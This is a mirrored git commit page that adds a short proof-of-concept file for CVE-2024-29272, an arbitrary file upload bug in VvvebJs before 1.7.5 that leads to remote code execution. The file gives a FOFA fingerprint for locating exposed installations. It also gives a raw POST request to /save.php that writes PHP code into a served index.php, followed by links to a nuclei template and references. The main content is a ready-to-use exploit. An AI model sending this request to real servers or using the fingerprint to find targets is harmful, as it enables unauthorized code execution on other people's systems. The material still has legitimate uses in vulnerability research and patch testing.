mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Add files via upload
This commit is contained in:
parent
8aba209f09
commit
789a1566a0
@ -0,0 +1,20 @@
|
|||||||
|
## VvvebJs < 1.7.5 Arbitrary File Upload - RCE (CVE-2024-29272)
|
||||||
|
|
||||||
|
## fofa
|
||||||
|
```
|
||||||
|
icon_hash="524332373"
|
||||||
|
```
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
POST /save.php HTTP/1.1
|
||||||
|
Host:
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
|
||||||
|
file=demo%2Flanding%2Findex.php&html=<?php%20phpinfo();%20?>
|
||||||
|
```
|
||||||
|
## nuclei Template
|
||||||
|
https://github.com/projectdiscovery/nuclei-templates/pull/10608/files
|
||||||
|
|
||||||
|
## ref
|
||||||
|
https://github.com/givanz/VvvebJs/issues/343
|
||||||
|
https://github.com/awjkjflkwlekfdjs/CVE-2024-29272/tree/main
|
||||||
Loading…
x
Reference in New Issue
Block a user